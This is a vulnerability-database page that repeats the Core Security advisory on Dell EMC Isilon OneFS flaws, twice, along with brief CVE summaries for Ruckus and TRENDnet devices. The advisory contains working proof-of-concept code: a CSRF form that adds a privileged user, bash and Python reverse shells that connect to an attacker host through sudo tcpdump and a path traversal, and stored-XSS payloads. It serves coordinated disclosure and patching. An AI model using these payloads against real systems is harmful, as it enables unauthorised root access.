VARIoT IoT vulnerabilities database

Ruckus Networks Unleashed AP firmware releases before 200.6.10.1.x and Ruckus Networks Zone Director firmware releases 10.1.0.0.x, 9.10.2.0.x, 9.12.3.0.x, 9.13.3.0.x, 10.0.1.0.x or before contain authenticated Root Command Injection in the CLI that could allow authenticated valid users to execute privileged commands on the respective systems. Both Ruckus Networks Unleashed AP and Ruckus Networks Zone Director are wireless access points from Ruckus Wireless. A remote attacker could exploit this vulnerability to execute privileged commands

TRENDnet TEW-751DR v1.03B03, TEW-752DRU v1.03B01, and TEW733GR v1.03B01 devices allow authentication bypass via an AUTHORIZED_GROUP=1 value, as demonstrated by a request for getcfg.php. TRENDnet TEW-751DR , TEW-752DRU ,and TEW733GR The device contains an input validation vulnerability.Information may be obtained. TEW-751DR\\TEW-752DRU\\TEW-733GR is a router product of TrendNET Trends. An information disclosure vulnerability exists in the TrendNET router device. An attacker can exploit the vulnerability to obtain the admin user password without logging in. Input validation vulnerabilities exist in TRENDnet TEW-751DR version 1.03B03, TEW-752DRU version 1.03B01, and TEW733GR version 1.03B01

Ruckus Networks Solo APs firmware releases R110.x or before and Ruckus Networks SZ managed APs firmware releases R5.x or before contain authenticated Root Command Injection in the web-GUI that could allow authenticated valid users to execute privileged commands on the respective systems. web-GUI is one of the web graphical user interfaces. A remote attacker could exploit this vulnerability to execute privileged commands

Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6 is affected by a cross-site scripting vulnerability in the Network Configuration page within the OneFS web administration interface. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. Dell EMC Isilon OneFS is prone to the following multiple security vulnerabilities. 1. A cross-site request-forgery vulnerability 2. A local privilege escalation vulnerability 3. A remote privilege escalation vulnerability 4. Multiple HTML-injection vulnerabilities Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user or to gain elevated root privileges and perform certain unauthorized actions and gain access to the affected application. OneFS web administration interface is one of the web management interfaces. Note: In Isilon OneFS, running in compadmin mode, compadmin user is less privileged than the nodes' root users. A malicious user may potentially exploit these vulnerability to send unauthorized requests to the server on behalf of authenticated users of the application. CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Resolution: The following Dell EMC Isilon OneFS maintenance releases addresses these vulnerabilities (except for CVE-2018-1213): Dell EMC Isilon OneFS 8.1.0.2 Patches are available for the below versions: Patch-213283 for OneFS 8.1.0.2 (CVE-2018-1213 only) Patch-217638 for OneFS 8.1.0.1 (all CVEs) Patch-213281 for OneFS 8.1.0.0 (all CVEs) Patch-213280 for OneFS 8.0.1.2 (all CVEs) Patch-213278 for OneFS 8.0.0.6 (all CVEs) Patch-217637 for OneFS 8.0.0.5 (all CVEs) Patch-211980 for OneFS 8.0.0.4 (all CVEs) IMPORTANT: If you update Isilon OneFS with a patch from this list, and you are using Insight IQ, you must upgrade to Insight IQ 4.1.2 prior to installing the patch. This advisory will be updated when fixes are available for additional versions. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJar7X8AAoJEHbcu+fsE81ZnVsH/RkfP2XUz4sHV2uQofuZR2bJ 319oyT9XVWUsOwCtQQ2ty/rolXHlO/B1viIq5OYJo4sTrN9s8dupz/Patek9HdiT RR0nvSVEgLM4C8NwB30hwJO8luuO8RDQUc3BQnSo6Vy8b1zM9F7A+yMZgseUoOaW u5jduNB8kvTAAyK4SnujqyBE4eT193x2yxAr15VoMRNFlmmu+S8GHpcCMoE0CDRt 05zhC6wCelN9BA0Bf7D533ffigfP8QAe+zw/OaQgQcEmoe5ys9aaHp2EJaAF5UZN Eh5JtXuwGX3dq0GDdVgbrA0ZlQlLConpBHhZEoIn99YF4MHpbp9l3QbeEYUS2ko= =c/8F -----END PGP SIGNATURE----- . **Advisory Information** Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL: http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities Date published: 2018-02-14 Date of last update: 2018-02-14 Vendors contacted: Dell EMC Release mode: Coordinated release 2. **Vulnerability Information** Class: Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, CVE-2018-1202 3. **Vulnerability Description** Dell EMC's website states that:[1] The EMC Isilon scale-out NAS storage platform combines modular hardware with unified software to harness unstructured data. Powered by the OneFS operating system, an EMC Isilon cluster delivers a scalable pool of storage with a global namespace. The platform's unified software provides centralized Web-based and command-line administration to manage the following features: - A cluster that runs a distributed file system - Scale-out nodes that add capacity and performance - Storage options that manage files and tiering - Flexible data protection and high availability - Software modules that control costs and optimize resources Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root. **Vulnerable Packages** . Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) . Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs) . Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188, CVE-2018-1201, CVE-2018-1204, CVE-2018-1213) . Dell EMC Isilon OneFS version 7.1.1.11 (CVE-2018-1186, CVE-2018-1201, CVE-2018-1202, CVE-2018-1204, CVE-2018-1213) Other products and versions might be affected, but they were not tested. https://support.emc.com/downloads/15209_Isilon-OneFS 6. **Credits** These vulnerabilities were discovered and researched by Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. **Technical Description / Proof of Concept Code** The Web console contains several sensitive features that are vulnerable to cross-site request forgery. We describe this issue in section 7.1. Sections 7.2 and 7.3 show two vectors to escalate privileges to root. Various persistent cross-site scripting issues are presented in the remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). **Cross-site request forgery leading to command execution** [CVE-2018-1213] There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The Web console contains a plethora of sensitive actions that can be abused, such as adding new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users. All requests are JSON-encoded, which in some cases might hinder exploitation of CSRF vulnerabilities. However, the application does not verify the content-type set. This allows an attacker to exploit the CSRF vulnerabilities by setting a text/plain content-type and sending the request body as JSON_PAYLOAD=ignored. The following proof of concept creates a new user and assigns him a new role with enough privileges to log in via SSH, configure identifies, manage authentication providers, configure the cluster and run the remote support tools. /----- <html> <body> <form id="addUser" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true&resolve_names=true&start=0&zone=System&provider=lsa-local-provider%3ASystem" method="POST" enctype="text/plain"> <input type="hidden" name="{"name":"pepito","enabled":true,"shell":"/bin/zsh","password_expires":false,"password":"pepito"}" value="" /> </form> <form id="addRole" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/roles" method="POST" enctype="text/plain"> <input type="hidden" name="{"members":[{"name":"pepito","type":"user"}],"name":"pepito_role","privileges":[{"id":"ISI_PRIV_AUTH","name":"Auth","read_only":false},{"id":"ISI_PRIV_CLUSTER","name":"Cluster","read_only":false},{"id":"ISI_PRIV_REMOTE_SUPPORT","name":"Remote Support","read_only":false},{"id":"ISI_PRIV_LOGIN_SSH","name":"SSH","read_only":true}]}" value="" /> </form> <script> document.getElementById("addUser").submit(); window.setTimeout(function() { document.getElementById("addRole").submit() }, 1000); </script> </body> </html> -----/ 7.2. **Privilege escalation due to incorrect sudo permissions** [CVE-2018-1203] The compadmin user can run the tcpdump binary with root privileges via sudo. This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files. /----- pepe-1$ id uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) pepe-1$ cat /tmp/lala.sh #!/bin/bash bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 -----/ Once the desired shell script is in place, the attacker can run tcpdump as follows to trigger the execution: /----- pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump tcpdump: WARNING: unable to contact casperd tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size 65535 bytes /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused -----/ As can be seen below, the script runs with root privileges: /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 57692) bash: no job control in this shell [root@pepe-1 /compadmin]# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.3. **Privilege escalation via remote support scripts** [CVE-2018-1204] >From the documentation: "OneFS allows remote support through EMC Secure Remote Services (ESRS) which monitors your EMC Isilon cluster, and with your permission, allows remote access to Isilon Technical Support personnel to gather cluster data and troubleshoot issues." "After you enable remote support through ESRS, Isilon Technical Support personnel can request logs with scripts that gather EMC Isilon cluster data and then upload the data. The remote support scripts based on the Isilon isi_gather_info log-gathering tool are located in the /ifs/data/Isilon_Support/ directory on each node." "Additionally, isi_phone_home, a tool that focuses on cluster- and node-specific data, is enabled once you enable ESRS. This tool is pre-set to send information about your cluster to Isilon Technical Support on a weekly basis. You can disable or enable isi_phone_home from the OneFS command-line interface." As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo. This tool is vulnerable to a path traversal when reading the script file to run, which would enable an attacker to execute arbitrary python code with root privileges. If remote support is not enabled, an attacker could perform the following operations in order to enable it: /----- pepe-1$ sudo isi network subnets create 1 ipv4 1 pepe-1$ sudo isi network pools create 1.0 pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes --primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no --gateway-access-pools=1.0 -----/ The isi_phone_home tool is supposed to run scripts located in the root-only writable directory /usr/local/isi_phone_home/script. However, the provided script name is used to construct the file path without sanitization, allowing an attacker to reference other locations. /----- def run_script(script_file_name): script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name if os.path.isfile(script_path): cmd = 'python ' + script_path + ' 2>&1 ' command_thread = command.Command(cmd) exit_code, output = command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) if exit_code: logging.error("Error: {0} running script: {1} ".format(str(exit_code), output)) else: logging.error("File: {0} list_file_name doesn't exist ".format(script_path)) -----/ The final step would be to create a malicious python script on any writable location and call it via the isi_phone_tool using sudo. Keep in mind that the previous steps are not required if the system does already have remote support enabled. /----- pepe-1$ cat /tmp/lala.py #!/usr/bin/env python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.66",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) pepe-1$ sudo /usr/bin/isi_phone_home --script-file ../../../../../tmp/lala.py -----/ /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 56807) pepe-1# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.4. *Persistent cross-site scripting in the cluster description* [CVE-2018-1186] The description parameter of the /cluster/identity endpoint is vulnerable to cross-site scripting. After the cluster's description is updated, the payload will be executed every time the user opens the Web console. /----- PUT /platform/3/cluster/identity HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 61 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"description":"my cluster<img src=x onerror=\"alert(1)\"/>"} -----/ 7.5. After the description is updated, the payload will be executed every time the user opens the network configuration page. /----- POST /platform/4/network/groupnets HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 186 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"description":"lala<script>alert(1)</script>","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} -----/ 7.6. **Persistent cross-site scripting in the Authentication Providers page** [CVE-2018-1188] The realm parameter of the /auth/settings/krb5/realms endpoint is vulnerable to cross-site scripting. After the realm is updated, the payload will be executed every time the user opens the Kerberos tab of the Authentication Providers page. /----- POST /platform/1/auth/settings/krb5/realms HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 78 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"is_default_realm":true,"kdc":[],"realm":"ASDASD<img src=x onerror=alert(1)"} -----/ 7.7. **Persistent cross-site scripting in the Antivirus page** [CVE-2018-1189] The name parameter of the /antivirus/policies endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the Antivirus page. /----- POST /platform/3/antivirus/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 172 Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06; Connection: close {"name":"pepe<img src=x onerror=\"alert(1)\"/>","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null} -----/ 7.8. **Persistent cross-site scripting in the Job Operations page** [CVE-2018-1201] The description parameter of the /job/policies endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the Impact Policies section of the Job Operations page. /----- POST /platform/1/job/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 210 Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; Connection: close {"name":"my policy","description":"<img src=x onerror=\"alert(1)\"/>","intervals":[{"begin":"Sunday 00:00","end":"Sunday 00:00","impact":"Low"},{"impact":"Low","begin":"Sunday 01:03","end":"Monday 01:01"}]} -----/ 7.9. **Persistent cross-site scripting in the NDMP page** [CVE-2018-1202] The name parameter of the /protocols/ndmp/users endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the NDMP Settings section of the NDMP page. /----- POST /platform/3/protocols/ndmp/users HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 64 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"name":"<img src=x onerror=\"alert(1)\"/>","password":"123123"} -----/ 8. **Report Timeline** 2017-09-25: Core Security sent an initial notification to Dell EMC, including a draft advisory. 2017-09-26: Dell EMC confirmed reception and informed an initial response would be ready by October 5th. 2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities reported except one, for which evaluation will be finalized soon. Dell EMC stated that, for the confirmed issues, a remediation plan will be provided by 10/16. 2017-10-05: Core Security thanked the follow up email. 2017-10-06: Dell EMC reported an update on one privilege escalation vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE both are equivalent to admin level access'. They said they will be updating the documentation to make it clearer. 2017-10-11: Core Security thanked for the clarification and confirmed that section will be removed from the final advisory. 2017-10-16: Dell EMC sent a schedule for fixing six of the reported vulnerabilities, with specific dates for every product's version. 2017-10-16: Core Security thanked the information and said it will analyze the proposals sent once all the data is available. 2017-10-19: Dell EMC sent a schedule for the remaining three reported vulnerabilities, with specific dates for every product's version. 2017-10-31: Core Security on the schedule sent, stating that fixing the vulnerabilities by June 2018 is unacceptable given current industry standards. Requested a review of the timeline or a thorough explanation that justifies such delay. 2017-11-01: Dell EMC answered back stating that after reviewing the original schedule, they said they believe they could have fixes ready for versions 8.0.x and 8.1.x by January 2018. Only caveat is the vulnerability 7.1 that might be pushed past January, although they said they think they could meet the January deadline. 2017-11-13: Core Security thanked Dell's review of the release dates and agreed on the proposed schedule, stating Core Security would like to publish a single advisory for all the vulnerabilities reported. Also requested CVE IDs for each of the issues. 2018-01-16: Core Security asked for a status update on the release date for the fixes since there was no update from Dell EMC. 2018-01-17: Dell EMC answered back stating they are awaiting confirmation from the product team about the exact dates of release. They said they will get back to us by the end of this week. Dell EMC also asked our GPG public key again. 2018-01-18: Core Security thanked for the update and sent the advisory's public GPG key. 2018-01-19: Dell EMC stated they are currently working on drafting their advisory and will send it back to us (including CVEs) once they have the necessary approvals. 2018-01-23: Dell EMC asked for our updated draft advisory. 2018-01-25: Dell EMC notified that the team are targeting to have the fix available by February 12th. Additionally, Dell will send its draft advisory by January 31th. 2018-01-29: Core Security thanked for the update and proposed February 14th as publication date. 2018-01-31: Dell EMC informed Core Security that they agreed to release on February 14th. They also provided CVE IDs for each vulnerability reported. 2018-02-01: Dell EMC sent its draft advisory. 2018-02-14: Advisory CORE-2017-0009 published. **References** [1] https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, and versions 7.2.1.x is affected by a cross-site scripting vulnerability in the Authorization Providers page within the OneFS web administration interface. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. Dell EMC Isilon Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Dell EMC Isilon OneFS is prone to the following multiple security vulnerabilities. 1. A cross-site request-forgery vulnerability 2. A local privilege escalation vulnerability 3. A remote privilege escalation vulnerability 4. Multiple HTML-injection vulnerabilities Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user or to gain elevated root privileges and perform certain unauthorized actions and gain access to the affected application. OneFS web administration interface is one of the web management interfaces. Note: In Isilon OneFS, running in compadmin mode, compadmin user is less privileged than the nodes' root users. CVSS v3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) Path Traversal Vulnerability (CVE-2018-1204) Dell EMC Isilon OneFS is affected by a path traversal vulnerability in the isi_phone_home tool. A malicious user may potentially exploit these vulnerability to send unauthorized requests to the server on behalf of authenticated users of the application. CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Resolution: The following Dell EMC Isilon OneFS maintenance releases addresses these vulnerabilities (except for CVE-2018-1213): Dell EMC Isilon OneFS 8.1.0.2 Patches are available for the below versions: Patch-213283 for OneFS 8.1.0.2 (CVE-2018-1213 only) Patch-217638 for OneFS 8.1.0.1 (all CVEs) Patch-213281 for OneFS 8.1.0.0 (all CVEs) Patch-213280 for OneFS 8.0.1.2 (all CVEs) Patch-213278 for OneFS 8.0.0.6 (all CVEs) Patch-217637 for OneFS 8.0.0.5 (all CVEs) Patch-211980 for OneFS 8.0.0.4 (all CVEs) IMPORTANT: If you update Isilon OneFS with a patch from this list, and you are using Insight IQ, you must upgrade to Insight IQ 4.1.2 prior to installing the patch. This advisory will be updated when fixes are available for additional versions. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJar7X8AAoJEHbcu+fsE81ZnVsH/RkfP2XUz4sHV2uQofuZR2bJ 319oyT9XVWUsOwCtQQ2ty/rolXHlO/B1viIq5OYJo4sTrN9s8dupz/Patek9HdiT RR0nvSVEgLM4C8NwB30hwJO8luuO8RDQUc3BQnSo6Vy8b1zM9F7A+yMZgseUoOaW u5jduNB8kvTAAyK4SnujqyBE4eT193x2yxAr15VoMRNFlmmu+S8GHpcCMoE0CDRt 05zhC6wCelN9BA0Bf7D533ffigfP8QAe+zw/OaQgQcEmoe5ys9aaHp2EJaAF5UZN Eh5JtXuwGX3dq0GDdVgbrA0ZlQlLConpBHhZEoIn99YF4MHpbp9l3QbeEYUS2ko= =c/8F -----END PGP SIGNATURE----- . **Advisory Information** Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL: http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities Date published: 2018-02-14 Date of last update: 2018-02-14 Vendors contacted: Dell EMC Release mode: Coordinated release 2. **Vulnerability Information** Class: Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, CVE-2018-1202 3. **Vulnerability Description** Dell EMC's website states that:[1] The EMC Isilon scale-out NAS storage platform combines modular hardware with unified software to harness unstructured data. Powered by the OneFS operating system, an EMC Isilon cluster delivers a scalable pool of storage with a global namespace. The platform's unified software provides centralized Web-based and command-line administration to manage the following features: - A cluster that runs a distributed file system - Scale-out nodes that add capacity and performance - Storage options that manage files and tiering - Flexible data protection and high availability - Software modules that control costs and optimize resources Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root. **Vulnerable Packages** . Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) . Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs) . Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188, CVE-2018-1201, CVE-2018-1204, CVE-2018-1213) . https://support.emc.com/downloads/15209_Isilon-OneFS 6. **Credits** These vulnerabilities were discovered and researched by Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. **Technical Description / Proof of Concept Code** The Web console contains several sensitive features that are vulnerable to cross-site request forgery. We describe this issue in section 7.1. Sections 7.2 and 7.3 show two vectors to escalate privileges to root. Various persistent cross-site scripting issues are presented in the remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). **Cross-site request forgery leading to command execution** [CVE-2018-1213] There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The Web console contains a plethora of sensitive actions that can be abused, such as adding new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users. All requests are JSON-encoded, which in some cases might hinder exploitation of CSRF vulnerabilities. However, the application does not verify the content-type set. This allows an attacker to exploit the CSRF vulnerabilities by setting a text/plain content-type and sending the request body as JSON_PAYLOAD=ignored. The following proof of concept creates a new user and assigns him a new role with enough privileges to log in via SSH, configure identifies, manage authentication providers, configure the cluster and run the remote support tools. /----- <html> <body> <form id="addUser" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true&resolve_names=true&start=0&zone=System&provider=lsa-local-provider%3ASystem" method="POST" enctype="text/plain"> <input type="hidden" name="{"name":"pepito","enabled":true,"shell":"/bin/zsh","password_expires":false,"password":"pepito"}" value="" /> </form> <form id="addRole" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/roles" method="POST" enctype="text/plain"> <input type="hidden" name="{"members":[{"name":"pepito","type":"user"}],"name":"pepito_role","privileges":[{"id":"ISI_PRIV_AUTH","name":"Auth","read_only":false},{"id":"ISI_PRIV_CLUSTER","name":"Cluster","read_only":false},{"id":"ISI_PRIV_REMOTE_SUPPORT","name":"Remote Support","read_only":false},{"id":"ISI_PRIV_LOGIN_SSH","name":"SSH","read_only":true}]}" value="" /> </form> <script> document.getElementById("addUser").submit(); window.setTimeout(function() { document.getElementById("addRole").submit() }, 1000); </script> </body> </html> -----/ 7.2. **Privilege escalation due to incorrect sudo permissions** [CVE-2018-1203] The compadmin user can run the tcpdump binary with root privileges via sudo. This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files. /----- pepe-1$ id uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) pepe-1$ cat /tmp/lala.sh #!/bin/bash bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 -----/ Once the desired shell script is in place, the attacker can run tcpdump as follows to trigger the execution: /----- pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump tcpdump: WARNING: unable to contact casperd tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size 65535 bytes /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused -----/ As can be seen below, the script runs with root privileges: /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 57692) bash: no job control in this shell [root@pepe-1 /compadmin]# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.3. **Privilege escalation via remote support scripts** [CVE-2018-1204] >From the documentation: "OneFS allows remote support through EMC Secure Remote Services (ESRS) which monitors your EMC Isilon cluster, and with your permission, allows remote access to Isilon Technical Support personnel to gather cluster data and troubleshoot issues." "After you enable remote support through ESRS, Isilon Technical Support personnel can request logs with scripts that gather EMC Isilon cluster data and then upload the data. The remote support scripts based on the Isilon isi_gather_info log-gathering tool are located in the /ifs/data/Isilon_Support/ directory on each node." "Additionally, isi_phone_home, a tool that focuses on cluster- and node-specific data, is enabled once you enable ESRS. This tool is pre-set to send information about your cluster to Isilon Technical Support on a weekly basis. You can disable or enable isi_phone_home from the OneFS command-line interface." As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo. This tool is vulnerable to a path traversal when reading the script file to run, which would enable an attacker to execute arbitrary python code with root privileges. If remote support is not enabled, an attacker could perform the following operations in order to enable it: /----- pepe-1$ sudo isi network subnets create 1 ipv4 1 pepe-1$ sudo isi network pools create 1.0 pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes --primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no --gateway-access-pools=1.0 -----/ The isi_phone_home tool is supposed to run scripts located in the root-only writable directory /usr/local/isi_phone_home/script. However, the provided script name is used to construct the file path without sanitization, allowing an attacker to reference other locations. /----- def run_script(script_file_name): script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name if os.path.isfile(script_path): cmd = 'python ' + script_path + ' 2>&1 ' command_thread = command.Command(cmd) exit_code, output = 